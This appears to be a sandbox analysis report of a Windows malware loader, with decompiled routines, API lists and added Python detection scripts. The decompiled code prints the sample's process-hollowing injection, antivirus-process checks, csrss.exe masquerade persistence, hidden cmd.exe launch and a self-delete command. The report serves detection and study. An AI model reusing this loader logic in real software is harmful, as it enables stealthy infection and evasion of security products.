																		_t110 = E035D7FA0(_t130, _t143,  &E035DAAD0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E035D1970(_t143, "\\");
																			E035D1970(_t143, "viTRMUuKeV");
																			E035D1970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E035D6D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E035D1510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
															}
														} else {
															L20:
															_push(_t143);
															L21:
															E035D1510();
															_t153 = _t155 + 4;
														}
													}
													DeleteFileW( &_v1116);
													 *0x37a2e00 =  &(( *0x37a2e00)[0]);
													E035D1A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
													E035D1970( &_v1636, "\\");
													E035D1970( &_v1636, "csrss.exe");
													E035D6340( &_v1636);
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						} else {
							 *0x37a2e00 =  &(( *0x37a2e00)[0]);
							return _t53;
						}
					}
				}
			}
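The tail of this function shows the persistence hand-off. One branch launches a new process with CreateProcessW and creation flag 0x8000000 (CREATE_NO_WINDOW) and then calls ExitProcess; the other waits up to 0xea60 ms (60 s) on a handle. Before that, the code builds a path ending in \viTRMUuKeV.url (the constant 7 passed to E035D7FA0 is consistent with CSIDL_STARTUP, which is an inference rather than something the listing states), deletes that file together with the one named in _v1116, and finally assembles C:\ProgramData\LKBNMTFJgl\csrss.exe and hands it to E035D6340. A csrss.exe that lives anywhere other than %SystemRoot%\System32 is a process-name masquerade, which is the cheapest thing to hunt for. The triage check below is an added example written for this report, not code from the report or from the sample: it classifies file paths against those three artefacts. The Startup folder as the .url's parent directory, the user profile paths and the sibling file name constructed.dat are assumptions made up for the constructed sample input.

```python
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Indicators taken from the decompiled tail: the drop directory, the process
# name it is launched under, and the .url file name are literal in the listing.
DROP_DIR = r"C:\ProgramData\LKBNMTFJgl"
MASQUERADE_NAME = "csrss.exe"
DROPPED_URL_NAME = "viTRMUuKeV.url"

# Directory a genuine csrss.exe lives in on a default Windows install.
LEGIT_CSRSS_DIRS = (r"C:\Windows\System32",)


def _same_dir(a: str, b: str) -> bool:
    """Case-insensitive comparison of two Windows directory paths.

    PureWindowsPath normalises forward slashes and trailing separators, so
    C:/ProgramData/LKBNMTFJgl/ and C:\\ProgramData\\LKBNMTFJgl compare equal.
    """
    return str(PureWindowsPath(a)).lower() == str(PureWindowsPath(b)).lower()


def classify_path(path: str) -> Optional[str]:
    """Return a finding label for one file path, or None if it looks benign.

    Checks, in order of severity:
      1. csrss.exe anywhere except System32 (process-name masquerade);
      2. the dropped launcher viTRMUuKeV.url, wherever it sits;
      3. any other file under the LKBNMTFJgl drop directory in ProgramData.
    """
    p = PureWindowsPath(path)
    name = p.name.lower()
    parent = str(p.parent)

    if name == MASQUERADE_NAME.lower():
        if any(_same_dir(parent, d) for d in LEGIT_CSRSS_DIRS):
            return None
        return "csrss.exe outside System32 (masquerade)"
    if name == DROPPED_URL_NAME.lower():
        return "dropped .url launcher"
    if _same_dir(parent, DROP_DIR):
        return "file in miner drop directory"
    return None


def triage(paths: List[str]) -> Dict[str, str]:
    """Map each suspicious path in `paths` to its finding label."""
    findings: Dict[str, str] = {}
    for path in paths:
        label = classify_path(path)
        if label is not None:
            findings[path] = label
    return findings


# Constructed sample inventory, as a file-system or process listing might give it.
# The Startup folder location of the .url and the constructed.dat sibling are
# assumptions for this example, not artefacts named in the listing.
SAMPLE_PATHS = [
    r"C:\Windows\System32\csrss.exe",                       # genuine
    r"C:\ProgramData\LKBNMTFJgl\csrss.exe",                 # the copy the listing launches
    r"C:\ProgramData\LKBNMTFJgl\constructed.dat",           # constructed sibling in the drop dir
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url",
    r"C:\Users\user\Downloads\notes.txt",                   # benign
]

if __name__ == "__main__":
    for path, label in triage(SAMPLE_PATHS).items():
        print(f"{label:42s} {path}")
```

Because the sample itself calls DeleteFileW on the .url path and on _v1116, a live host may no longer hold the launcher at all; the ProgramData copy of csrss.exe is the artefact most likely to survive, and evidence of the deleted files has to come from the USN journal, $MFT slack or Prefetch rather than from a directory walk.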

[Instruction address column of this decompiled listing, detached from the code lines during extraction: 161 addresses in the range 0x035d76a0 to 0x035d7a97, including several 0x00000000 entries.]
                                                                                                                                          0x035d7935
                                                                                                                                          0x035d7938
                                                                                                                                          0x035d793a
                                                                                                                                          0x035d7948
                                                                                                                                          0x035d794d
                                                                                                                                          0x035d7950
                                                                                                                                          0x035d7952
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7958
                                                                                                                                          0x035d795e
                                                                                                                                          0x035d7969
                                                                                                                                          0x035d7974
                                                                                                                                          0x035d7979
                                                                                                                                          0x035d797c
                                                                                                                                          0x035d7982
                                                                                                                                          0x035d7984
                                                                                                                                          0x035d7985
                                                                                                                                          0x035d7987
                                                                                                                                          0x00000000
                                                                                                                                          0x035d798d
                                                                                                                                          0x035d798d
                                                                                                                                          0x035d7992
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7992
                                                                                                                                          0x035d7987
                                                                                                                                          0x035d7952
                                                                                                                                          0x035d793a
                                                                                                                                          0x035d7927
                                                                                                                                          0x035d78a0
                                                                                                                                          0x035d78a0
                                                                                                                                          0x035d78a0
                                                                                                                                          0x035d78a1
                                                                                                                                          0x035d78a1
                                                                                                                                          0x035d78a6
                                                                                                                                          0x035d78a6
                                                                                                                                          0x035d789e
                                                                                                                                          0x035d78b0
                                                                                                                                          0x035d78b2
                                                                                                                                          0x035d78c5
                                                                                                                                          0x035d78d6
                                                                                                                                          0x035d78e7
                                                                                                                                          0x035d78f3
                                                                                                                                          0x035d78fb
                                                                                                                                          0x035d7902
                                                                                                                                          0x035d7902
                                                                                                                                          0x035d786b
                                                                                                                                          0x035d776a
                                                                                                                                          0x035d7754
                                                                                                                                          0x035d773e
                                                                                                                                          0x035d7724
                                                                                                                                          0x035d76f3
                                                                                                                                          0x035d76f3
                                                                                                                                          0x035d76fe
                                                                                                                                          0x035d76fe
                                                                                                                                          0x035d76f1
                                                                                                                                          0x035d76c3

APIs
• Part of subcall function 035D7C30: InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 035D7C87
• GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200,?,?,?,?,?,?), ref: 035D7715
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 035D78B0
Strings
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: CrackDeleteFileInternetLongNamePath
• String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$ProgramData$\$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV
• API String ID: 3724707802-1124964399
• Opcode ID: 983be3b85b1fabc21cbb6823b67da54feca60f2db4066acec749086ae1c94f36
• Instruction ID: d6e5c17e04cb4cccbf2060fd0e554890fa25b514ab11cb440591fc3eb0d411fe
• Opcode Fuzzy Hash: 983be3b85b1fabc21cbb6823b67da54feca60f2db4066acec749086ae1c94f36
• Instruction Fuzzy Hash: DB9106B5940B1966EB30FBE8FC05FDE737CBF44241F0800A5E905E6062FB65A794CAA5
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 84%
// Analyst annotation (not decompiler output): this routine is the loader behind the
// "Injects a PE file into a foreign process" / "Modifies the context of a thread in
// another process" signatures above. It starts the target from _a4 suspended, maps an
// embedded PE image located at 0x35dc038 into that process and redirects the main
// thread's entry point. Field offsets are read as the IMAGE_NT_HEADERS32 layout.
// The listing is cut off at the end of this page.
E035D5B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
	intOrPtr _v12;
	void* _v16;
	void* _v20;
	void* _v24;
	void _v28;
	long _v32;
	char _v36;
	intOrPtr _v40;
	void* _v44;
	char _v112;
	struct _CONTEXT _v828;
	intOrPtr _t62;
	void* _t70;
	void* _t72;
	void* _t81;
	void* _t82;
	void* _t84;
	signed int _t85;
	void* _t90;
	void* _t94;
	void* _t95;
	void* _t108;
	void* _t115;
	void* _t117;
	void _t120;
	intOrPtr _t123;
	void* _t126;
	void* _t132;
	void* _t133;
	intOrPtr* _t136;
	void* _t137;
	void* _t138;
	void* _t142;
	void* _t143;

	_t115 = __ebx;
	// memset-style helper: zero the CONTEXT after ContextFlags (0x2c8 bytes)
	E035D1BB0( &(_v828.Dr0), 0, 0x2c8);
	_v28 = 0;
	_t138 = _t137 + 0xc;
	_v32 = 0;
	_v828.ContextFlags = 0x10007; // CONTEXT_FULL
	// 'MZ' check on the embedded image at 0x35dc038
	_t142 =  *0x35dc038 - 0x5a4d; // 0x6b7d
	if(_t142 == 0) {
		L3:
		// e_lfanew (offset 0x3c of the embedded image); _t126 becomes its IMAGE_NT_HEADERS
		_t62 =  *0x35dc074; // 0x383538b7
		__eflags =  *((intOrPtr*)(_t62 + 0x35dc038)) - 0x4550;
		_t6 = _t62 + 0x35dc038; // 0x3b92f8ef
		_t126 = _t6;
		if( *((intOrPtr*)(_t62 + 0x35dc038)) != 0x4550) { // 'PE'
			L27:
			__eflags = 0;
			return 0;
		} else {
			E035D1670( &_v112, 0, 0x44); // STARTUPINFOW, cb = 0x44
			E035D1670( &_v20, 0, 0x10);  // PROCESS_INFORMATION
			_v112 = 0x44;
			__eflags =  *0x37a1bb8;
			_push( &_v20);
			_push( &_v112);
			_push(0);
			_push(0);
			// creation flags: both branches include CREATE_SUSPENDED (0x4)
			if( *0x37a1bb8 == 0) {
				_push(0x14);      // CREATE_SUSPENDED | CREATE_NEW_CONSOLE
			} else {
				_push(0x800000c); // CREATE_NO_WINDOW | DETACHED_PROCESS | CREATE_SUSPENDED
			}
			_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
			__eflags = _t70;
			if(_t70 == 0) {
				goto L27;
			} else {
				_push(_t115);
				// _v16 = hThread, _v20 = hProcess of the suspended child
				_t72 = GetThreadContext(_v16,  &_v828);
				__eflags = _t72;
				if(_t72 == 0) {
					L26:
					// any failure below: kill the suspended child and clean up
					TerminateProcess(_v20, 0);
					CloseHandle(_v16);
					CloseHandle(_v20);
					__eflags = 0;
					return 0;
				} else {
					// in a freshly created suspended thread Ebx holds the PEB; +8 is ImageBaseAddress
					_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
					__eflags = _t81;
					if(_t81 == 0) {
						goto L26;
					} else {
						_t123 =  *((intOrPtr*)(_t126 + 0x34)); // OptionalHeader.ImageBase
						_t120 = _v28;                          // current image base of the child
						__eflags = _t120 - _t123;
						if(__eflags < 0) {
							L13:
							// VirtualAllocEx-style wrapper: reserve SizeOfImage (+0x50) at the
							// preferred ImageBase, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
							_t82 = E035D72C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
							_t132 = _t82;
							_v24 = _t132;
							__eflags = _t132;
							if(_t132 == 0) {
								goto L26;
							} else {
								asm("cdq");
								_t124 =  &_v36;
								_v44 = _t82;
								_v40 = _t123;
								// WriteProcessMemory-style wrapper: copy the headers (SizeOfHeaders, +0x54)
								_t84 = E035D74D0(_t82,  &_v36, _v20, _t82, _t123, 0x35dc038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
								__eflags = _t84;
								if(_t84 == 0) {
									goto L26;
								} else {
									// SizeOfOptionalHeader (+0x14) and NumberOfSections (+6): section copy loop follows
									_t85 =  *(_t126 + 0x14) & 0x0000ffff;
									_t117 = 0;
									__eflags = 0 -  *(_t126 + 6);
									if(0 >=  *(_t126 + 6)) {
										L20:
										// patch PEB->ImageBaseAddress in the child to the new image base
										_t42 = _t126 + 0x34; // 0x3b92f923
										_t90 = E035D74D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
										__eflags = _t90;
										if(_t90 == 0) {
											goto L26;
										} else {
											// Eax of the suspended main thread = new entry point (AddressOfEntryPoint, +0x28)
											_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
                                                                                                                                          														_t94 = SetThreadContext(_v16,  &_v828);
                                                                                                                                          														__eflags = _t94;
                                                                                                                                          														if(_t94 == 0) {
                                                                                                                                          															goto L26;
                                                                                                                                          														} else {
                                                                                                                                          															_t95 = E035D71A0(0, _t124, _v16);
                                                                                                                                          															__eflags = _t95;
                                                                                                                                          															if(_t95 == 0) {
                                                                                                                                          																goto L26;
                                                                                                                                          															} else {
                                                                                                                                          																Sleep(0x1388);
                                                                                                                                          																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                                                          																__eflags = _t133;
                                                                                                                                          																if(_t133 != 0) {
                                                                                                                                          																	E035D1BB0(_t133, 0, 0x138);
                                                                                                                                          																	E035D74D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
                                                                                                                                          																	VirtualFree(_t133, 0, 0x8000);
                                                                                                                                          																}
                                                                                                                                          																CloseHandle(_v16);
                                                                                                                                          																CloseHandle(_v20);
                                                                                                                                          																return _v12;
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          												} else {
                                                                                                                                          													_t34 = _t126 + 0x2c; // 0x3b92f91b
                                                                                                                                          													_t136 = _t34 + _t85;
                                                                                                                                          													asm("o16 nop [eax+eax]");
                                                                                                                                          													while(1) {
                                                                                                                                          														_t108 = E035D74D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x35dc038,  *((intOrPtr*)(_t136 - 4)), 0);
                                                                                                                                          														__eflags = _t108;
                                                                                                                                          														if(_t108 == 0) {
                                                                                                                                          															goto L26;
                                                                                                                                          														}
                                                                                                                                          														_t117 = _t117 + 1;
                                                                                                                                          														_t136 = _t136 + 0x28;
                                                                                                                                          														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
                                                                                                                                          														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
                                                                                                                                          															continue;
                                                                                                                                          														} else {
                                                                                                                                          															_t132 = _v24;
                                                                                                                                          															goto L20;
                                                                                                                                          														}
                                                                                                                                          														goto L28;
                                                                                                                                          													}
                                                                                                                                          													goto L26;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
                                                                                                                                          										if(__eflags > 0) {
                                                                                                                                          											goto L13;
                                                                                                                                          										} else {
                                                                                                                                          											__eflags = E035D7120(_t123, _v20, _t120, 0);
                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                          												goto L26;
                                                                                                                                          											} else {
                                                                                                                                          												goto L13;
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					E035D1CE0("0125789244697858", 0x10, 0x35dc038, 0xe7c00);
                                                                                                                                          					_t138 = _t138 + 0x10;
                                                                                                                                          					_t143 =  *0x35dc038 - 0x5a4d; // 0x6b7d
                                                                                                                                          					if(_t143 == 0) {
                                                                                                                                          						goto L3;
                                                                                                                                          					} else {
                                                                                                                                          						return 0;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				L28:
                                                                                                                                          			}
                                                                                                                                          0x035d5d62
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d60
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d30
                                                                                                                                          0x035d5d23
                                                                                                                                          0x035d5d11
                                                                                                                                          0x035d5cae
                                                                                                                                          0x035d5cb3
                                                                                                                                          0x035d5cb5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5cb7
                                                                                                                                          0x035d5cc2
                                                                                                                                          0x035d5cc4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5cc4
                                                                                                                                          0x035d5cb5
                                                                                                                                          0x035d5cac
                                                                                                                                          0x035d5c9e
                                                                                                                                          0x035d5c79
                                                                                                                                          0x035d5c60
                                                                                                                                          0x035d5bc6
                                                                                                                                          0x035d5bd7
                                                                                                                                          0x035d5bdc
                                                                                                                                          0x035d5bdf
                                                                                                                                          0x035d5be6
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5be8
                                                                                                                                          0x035d5bee
                                                                                                                                          0x035d5bee
                                                                                                                                          0x035d5be6
                                                                                                                                          0x00000000

APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000014,00000000,00000000,00000044,?,?,?,?,?,?,035D49E6), ref: 035D5C58
• GetThreadContext.KERNEL32(035D49E6,00010007,00000000,?,?,?,?,?,035D49E6,?,?,?), ref: 035D5C71
• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,035D49E6,?,?,?), ref: 035D5C96
• SetThreadContext.KERNEL32(035D49E6,00010007,?,?,00000000,3B92F923,00000004,00000000,?,00000000,?,035DC038,?,00000000,?,?), ref: 035D5DA0
• Sleep.KERNEL32(00001388,035D49E6,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5DBF
• VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5DD3
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D49E6,00000000,00000138,?,?,00003000,00000040), ref: 035D5E0F
• CloseHandle.KERNEL32(035D49E6,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5E1E
• CloseHandle.KERNEL32(?,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5E23
Strings
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
• String ID: 0125789244697858$D
• API String ID: 1428767187-3232960292
• Opcode ID: 9543e199f6e44f50aa3ba570154a7207dd70827ac43bb2a805951c71ca218f66
• Instruction ID: a3a2ea857b36cc834f28e6140c57afe8b851cad414b540b3f778e1104b4bbb16
• Opcode Fuzzy Hash: 9543e199f6e44f50aa3ba570154a7207dd70827ac43bb2a805951c71ca218f66
• Instruction Fuzzy Hash: 4481A471A41219ABEB31EB98FC45FEEB7B8FB04700F040555FA04FA1A0E771A954DB94
Uniqueness
Uniqueness Score: -1.00%
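
The raw argument columns in the APIs list above already spell out a process-hollowing sequence once the flag values are decoded: the sixth CreateProcessW argument 0x00000014 is CREATE_SUSPENDED|CREATE_NEW_CONSOLE, the 0x00010007 shown for GetThreadContext and SetThreadContext is CONTEXT_FULL on x86 (CONTEXT_i386|CONTROL|INTEGER|SEGMENTS), ReadProcessMemory reads exactly 4 bytes, and VirtualAlloc/VirtualFree use MEM_COMMIT|MEM_RESERVE (0x3000) and MEM_RELEASE (0x8000). The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses the nine API lines exactly as listed, decodes those arguments, and reports the chain CreateProcessW(CREATE_SUSPENDED) -> GetThreadContext -> ReadProcessMemory -> SetThreadContext in call-site order. Assumptions: the second column of the Get/SetThreadContext lines is treated as the ContextFlags value as the report prints it; the 4-byte read is consistent with, but not proof of, fetching the image base from the child's PEB; and the BENIGN_LINES input is constructed, not from the report, to mirror the CREATE_NO_WINDOW (0x8000000) launch in the decompiled routine that follows.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Input copied verbatim from this report's APIs list for the routine at
# 0x035D5Bxx-0x035D5Exx. Each column is the raw value the sandbox recorded at
# the call site; '?' is a value it could not resolve.
API_LINES = """\
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000014,00000000,00000000,00000044,?,?,?,?,?,?,035D49E6), ref: 035D5C58
• GetThreadContext.KERNEL32(035D49E6,00010007,00000000,?,?,?,?,?,035D49E6,?,?,?), ref: 035D5C71
• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,035D49E6,?,?,?), ref: 035D5C96
• SetThreadContext.KERNEL32(035D49E6,00010007,?,?,00000000,3B92F923,00000004,00000000,?,00000000,?,035DC038,?,00000000,?,?), ref: 035D5DA0
• Sleep.KERNEL32(00001388,035D49E6,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5DBF
• VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5DD3
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D49E6,00000000,00000138,?,?,00003000,00000040), ref: 035D5E0F
• CloseHandle.KERNEL32(035D49E6,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5E1E
• CloseHandle.KERNEL32(?,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5E23
"""

# Constructed negative case, NOT from the report: a plain launch with
# CREATE_NO_WINDOW (0x08000000), the flag the decompiled fallback path passes
# when it runs cmd.exe /C WScript. ref 00000000 marks the lines as synthetic.
BENIGN_LINES = """\
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00000000
• CloseHandle.KERNEL32(?), ref: 00000000
"""

# Win32 constants (winbase.h / winnt.h). For CONTEXT_* the low bits are listed
# separately from the 0x10000 CONTEXT_i386 architecture bit they normally carry.
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x10: "CREATE_NEW_CONSOLE", 0x08000000: "CREATE_NO_WINDOW"}
CONTEXT_FLAGS = {0x1: "CONTEXT_CONTROL", 0x2: "CONTEXT_INTEGER", 0x4: "CONTEXT_SEGMENTS", 0x10000: "CONTEXT_i386"}
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
CREATE_SUSPENDED = 0x4
CHAIN = ("CreateProcessW", "GetThreadContext", "ReadProcessMemory", "SetThreadContext")

# api -> (index of the argument worth decoding, its name, flag table or None for a size)
DECODE = {
    "CreateProcessW": (5, "dwCreationFlags", CREATION_FLAGS),
    "GetThreadContext": (1, "ContextFlags", CONTEXT_FLAGS),
    "SetThreadContext": (1, "ContextFlags", CONTEXT_FLAGS),
    "ReadProcessMemory": (3, "nSize", None),
    "VirtualAlloc": (2, "flAllocationType", ALLOC_TYPES),
    "VirtualFree": (2, "dwFreeType", ALLOC_TYPES),
}

LINE_RE = re.compile(r"^\W*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the report shows '?'
    ref: int                   # call-site address


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the report's bullet list of API calls into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",") if a.strip()]
            calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into symbolic names, keeping any unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(bit for bit in table if value & bit)
    return names + ([f"0x{leftover:x}"] if leftover else [])


def describe(c: ApiCall) -> str:
    """One-line summary of a call with its security-relevant argument decoded."""
    spec = DECODE.get(c.api)
    if spec is None or len(c.args) <= spec[0] or c.args[spec[0]] is None:
        return f"{c.ref:08X} {c.api}"
    idx, label, table = spec
    value = c.args[idx]
    text = f"0x{value:x}" if table is None else "|".join(decode_flags(value, table))
    return f"{c.ref:08X} {c.api}: {label}={text}"


def hollowing_sequence(calls: List[ApiCall]) -> List[ApiCall]:
    """Return the calls forming CreateProcessW(CREATE_SUSPENDED) -> GetThreadContext ->
    ReadProcessMemory -> SetThreadContext in call-site order, or [] when a link is
    missing or the child was not created suspended."""
    matched: List[ApiCall] = []
    for c in sorted(calls, key=lambda c: c.ref):
        if len(matched) == len(CHAIN):
            break
        if c.api != CHAIN[len(matched)]:
            continue
        if c.api == "CreateProcessW":
            flags = c.args[5] if len(c.args) > 5 else None  # dwCreationFlags
            if flags is None or not flags & CREATE_SUSPENDED:
                continue
        matched.append(c)
    return matched if len(matched) == len(CHAIN) else []


if __name__ == "__main__":
    for call in sorted(parse_api_lines(API_LINES), key=lambda c: c.ref):
        print(describe(call))
    print("hollowing chain:", [c.api for c in hollowing_sequence(parse_api_lines(API_LINES))])
```

Run as a script it prints one decoded line per call and the matched chain. Keying the match on the suspended-creation flag plus the ordered GetThreadContext/SetThreadContext pair, rather than on any single API, is what keeps it from firing on an ordinary CreateProcessW such as the CREATE_NO_WINDOW launch in the routine below; the 0x1388 (5000 ms) Sleep between SetThreadContext and VirtualAlloc is left undecoded since it is not part of the pattern.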

C-Code - Quality: 78%
/* Sandbox decompilation of the routine at 035D6A40 (image base 035D0000). The
   E035Dxxxx callees are other routines in the same dump, and _tNN are decompiler
   temporaries (_t80 is the frame pointer, _t81/_t82/_t84 the stack pointer), so
   the listing documents behaviour and is not meant to compile as-is. */
E035D6A40(void* __ecx, void* __eflags, intOrPtr _a4) {
	WCHAR* _v8;
	struct _PROCESS_INFORMATION _v24;
	struct _STARTUPINFOW _v92;
	char _v612;
	char _v740;
	short _v1780;
	char _v5876;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* _t38;
	int _t48;
	void* _t54;
	void* _t61;
	void* _t62;
	void* _t63;
	void* _t64;
	void* _t65;
	void* _t66;
	void* _t67;
	void* _t68;
	void* _t70;
	void* _t71;
	void* _t76;
	signed int _t79;
	void* _t80;
	void* _t81;
	void* _t82;
	void* _t84;

	_t71 = __ecx;
	E035D1BB0( &_v5876, 0, 0x1000);   /* (buf, 0, size): zero-fill, memset-like */
	_v8 = 0;
	E035D1BB0( &_v740, 0, 0x288);
	E035D1670( &_v740, 0, 0x288);     /* 0x288-byte block later handed to E035D29E0 */
	_t74 = _a4;
	E035D1A00( &_v612, _a4);          /* string assign; _a4 is the script path used by the WScript fallback at L22 */
	_t38 = E035D7ED0(_a4);            /* check on the path; give up if it fails */
	_t82 = _t81 + 0x30;
	if(_t38 == 0) {
		return _t38;
	}
	_push(_t68);
	_push(_t76);
	if(E035D8DD0() == 0) {
		L22:                           /* fallback: run the script via cmd.exe /C WScript "<path>" */
		E035D1BB0( &_v92, 0, 0x44);   /* sizeof(STARTUPINFOW) == 0x44 */
		asm("xorps xmm0, xmm0");
		asm("movups [ebp-0x14], xmm0"); /* zero _v24 (PROCESS_INFORMATION) */
		E035D1A00( &_v1780, L"cmd.exe /C WScript \"");
		E035D1970( &_v1780, _t74);    /* append the path */
		E035D1970( &_v1780, "\"");
		_t48 = E035D7ED0(_t74);
		if(_t48 != 0) {
			/* 0x8000000 == CREATE_NO_WINDOW: cmd.exe gets no console window */
			CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
			CloseHandle(_v24.hThread);
			_t48 = CloseHandle(_v24);  /* _v24.hProcess */
		}
		L24:
		return _t48;
	}
	/* Look for security products by process name; the first hit jumps to L10.
	   bdagent.exe / vsserv.exe: Bitdefender; cfp.exe / ccavsrv.exe / cmdagent.exe:
	   Comodo; avp.exe / avpui.exe: Kaspersky. */
	_t54 = E035D7EF0("bdagent.exe");
	_t84 = _t82 + 4;
	if(_t54 != 0) {
		L10:                           /* injection path */
		_push(0x1000);
		_push( &_v5876);
		/* The global at 0x37a1314 selects the target mode. 0: E035D80E0(&_v5876, 0x1000, 0)
		   yields one target PID. Otherwise E035D80E0(..., 1) fills the _v5876 buffer with
		   candidate PIDs (read below at ebp-0x16f0) and returns their count. */
		if( *0x37a1314 == 0) {
			_push(0);
			/* E035D29E0 appears to inject this module (base 0x35D0000) into the target PID,
			   with the 0x288-byte block as parameters and E035D6CA0 as the routine to run
			   there; success needs a non-zero return and _v8 set, else fall back to L22. */
			_t48 = E035D29E0( &_v740, 0x35d0000, E035D80E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E035D6CA0);
			_t82 = _t84 + 0x24;
			if(_t48 == 0 || _v8 == 0) {
				goto L22;
			} else {
				goto L24;
			}
		}
		_push(1);
		_t70 = E035D80E0(_t68, _t74, _t76);   /* number of candidate PIDs */
		_t82 = _t84 + 0xc;
		if(_t70 == 0) {
			goto L22;
		}
		_t79 = 0;
		if(_t70 == 0) {                /* decompiler duplicate of the check above */
			goto L22;
		}
		do {
			if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {   /* skip empty slots */
				goto L18;
			}
			_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
			if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {   /* never target itself */
				goto L18;
			}
